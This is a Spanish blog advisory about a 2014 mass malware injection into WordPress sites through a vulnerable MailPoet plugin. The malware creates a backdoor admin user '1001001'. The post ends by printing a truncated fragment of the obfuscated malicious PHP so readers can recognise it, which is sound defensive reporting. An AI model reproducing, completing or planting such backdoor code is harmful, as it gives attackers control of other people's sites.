Web BizarroWeb Bizarro

Suscríbete a nuestro Newsletter

X

Únete a nuestra lista de correos para recibir semanalmente actualizaciones de nuestro contenido.

Ataque masivo a sitios en Wordpress

Ataque masivo a sitios en Wordpress 24.JUL.14

Alvaro José Rios Ch
Fundador WebBizarro

En los últimos días se han reportado múltiples sitios desarrollados con Wordpress que presentan una una falla ocasionada por un malware inyectado en la aplicación, el objetivo principal son los sitios que están desarrollados en la plataforma que se encuentran desactualizados o con claves de administrador débiles.

El código PHP es inyectado en la aplicación y afecta no solo a los archivos del núcleo sino también a los archivos de temas y plugins, además de estar altamente ofuscado. El resultado de esto es que los sitios muestren en múltiples sitios el siguiente error:

Parse error: syntax error, unexpected ‘)’ in /home/user/public_html/site/wp-config.php on line 91

Al parecer el responsable es un plugin llamado MailPoet que tenia una vulnerabilidad que los atacantes aprovecharon para inyectar el código malicioso. El Malware permite crear una una puerta trasera que da acceso administrativo a todo el sistema, creando un usuario llamado 1001001.La recomendación si no estas infectado es actualizar de inmediato MailPoet para evitar ser una víctima.

Puedes verificar la seguridad de tu sitio en el siguiente link. Si ya estas infectado puedes intentar eliminar el código malicioso de los archivos infectados y eliminar el usuario directamente de la base de datos pero lo más recomendable es desinstalar el sistema y comenzar de nuevo con una instalación limpia de archivos y base de datos.

El código malicioso se ve como el que les coloco a continuación:

<?php $pblquldqei = ’5c%x7824-%x5c%x7824*!|!%x5c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%xq%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q7825)3of:opjudovg<~%x5c%x7824!%x5c%x782421787825!|!*!***b%x5c%x7825)…

Fuente: SucuriBlog | SucuriBlog 2

 


Esto también te puede interesar